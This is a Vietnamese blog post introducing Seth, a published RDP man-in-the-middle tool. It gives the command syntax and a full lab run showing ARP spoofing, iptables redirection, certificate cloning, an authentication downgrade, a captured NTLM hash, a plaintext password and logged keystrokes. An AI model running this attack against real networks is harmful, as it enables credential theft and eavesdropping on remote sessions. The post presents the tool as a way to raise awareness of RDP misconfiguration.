Seth - Tấn công MITM giao thức RDP - Thekalitools.com

Friday, October 13, 2017

Seth - Tấn công MITM giao thức RDP

Seth - SySS


Giới thiệu về MITM và RDP

Phương pháp tấn công MITM:

MITM hay Man-in-the-Middle (dịch ra là Người ở Giữa) là một phương pháp cho phép attacker can thiệp vào kết nối Internet của người khác và thu thập mọi thông tin truyền trên hệ thống mạng đó. Phương pháp này có thể hiểu đơn giản là nghe trộm.
Minh hoạ một kiểu tấn công MITM
MITM hoạt động bằng cách thiết lập các kết nối đến máy tính nạn nhân và trì hoãn các luồng dữ liệu giữa chúng. Trong trường hợp bị tấn công, nạn nhân A cứ tin tưởng là họ đang truyền thông một cách trực tiếp với nạn nhân B, trong khi đó sự thực thì các luồng truyền thông lại bị thông qua máy của attacker. Và kết quả là attacker có thể xem mà còn có thể gửi xen vào hay thay đổi luồng dữ liệu để kiểm soát sâu hơn những nạn nhân.

Giao thức RDP:

RDP hay Remote Desktop Protocol là một tính năng sẵn có trong hệ điều hành Windows, với tính năng này, bạn sẽ dễ dàng điều khiển các máy tính khác, hay để máy tính khác kết nối điều khiển máy tính mình. Và vì cũng là một giao thức qua mạng nên việc tấn công MITM hoàn toàn khả thi.

Seth - Công cụ tấn công MITM giao thức RDP:

Seth là một công cụ được lập trình bằng Python và Bash để thực hiện tấn công MITM giao thức RDP bằng cách hạ cấp (downgrade) kết nối để có thể thu thập được các thông tin truyền tải bằng văn bản. Mục đích nó được pháp triển là để nâng cao nhận thức và giáo dục về tầm quan trọng của việc cấu hình các kết nối RDP.
Tác giả: Adrian Vollmer (SySS GmbH)
Trang dự án: SySS-Research/Seth - Github

Hướng dẫn sử dụng Seth:

Cú pháp lệnh:

[[mcode]]$ seth <interface> <attacker-ip> <victim-ip> <target-ip> [tuỳ-chọn][[ecode]]
Lệnh rút gọn: (xem phần Mẫu)

Tuỳ chọn và tham số:

Với mỗi tuỳ chọn thì sẽ đi kèm với một tham số:
* Tham số bắt buộc:
[[scode]]<interface>[[escode]]: Tên card mạng sử dụng, nếu là card không dây thì phải chuyển sang monitor-mode.
[[scode]]<attacker-ip>[[escode]]: Địa chỉ IP của máy tấn công, đang chạy script này.
[[scode]]<victim-ip>[[escode]]: Địa chỉ IP của máy nạn nhân, đang yêu cầu điều khiển.
[[scode]]<target-ip>[[escode]]: Địa chỉ IP mục tiêu. Điền vào địa chỉ IP của máy RDP nếu máy RDP cùng mạng con với máy nạn nhân. Còn các trường hợp khác, hãy điền vào IP của gateway.

Mẫu:

Điều kiện:

  • Địa chỉ máy tấn công: 192.168.57.103
  • Địa chỉ máy nạn nhân: 192.168.57.2
  • Địa chỉ máy chạy dịch vụ RDP: 192.168.57.102

Vì ta có 3 IP có cùng tiền tố là 192.168.57.x nên ta có thể viết tắt như sau:
Thử chạy Seth.
[[lcode]]root@kali:~# ./seth.sh eth1 192.168.57.{103,2,102}
███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║   seth@vollmer.syss.de
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║   https://www.syss.de
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.102
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.103:50431
Downgrading authentication options from 11 to 3
Enable SSL
alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection lost
Connection received from 192.168.57.103:50409
Listening for new connection
Enable SSL
Connection lost
Connection received from 192.168.57.103:50410
Listening for new connection
Enable SSL
Hiding forged protocol request from client
.\alice:ilovebob
Keyboard Layout: 0x409 (English_United_States)
Key press:   LShift
Key press:   S
Key release:                 S
Key release:                 LShift
Key press:   E
Key release:                 E
Key press:   C
Key release:                 C
Key press:   R
Key release:                 R
Key press:   E
Key release:                 E
Key press:   T
Key release:                 T
Connection lost
[*] Cleaning up...
[*] Done.[[ecode]]
Video Demo:
Tham khảo quantrimangpcworld

No comments:

Post a Comment